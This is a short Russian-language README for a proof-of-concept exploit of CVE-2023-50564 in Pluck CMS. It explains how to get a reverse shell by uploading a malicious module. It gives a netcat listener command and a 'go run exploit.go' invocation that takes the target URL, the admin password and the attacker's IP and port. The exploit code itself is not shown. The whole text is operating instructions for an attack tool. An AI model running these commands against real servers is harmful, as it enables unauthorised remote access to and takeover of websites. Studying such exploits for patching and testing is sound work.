
Эксплойт-доказательство концепции для CVE-2023-50564, нацеленный на Pluck CMS, доставляющий обратную оболочку через установку вредоносного модуля.
Сначала настройте прослушиватель для обратной оболочки.
Терминал 1
nc -nlvp <lport>
Запустите скрипт, который попытается установить модуль pluck, отправляющий обратную оболочку обратно нам.
Терминал 2
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>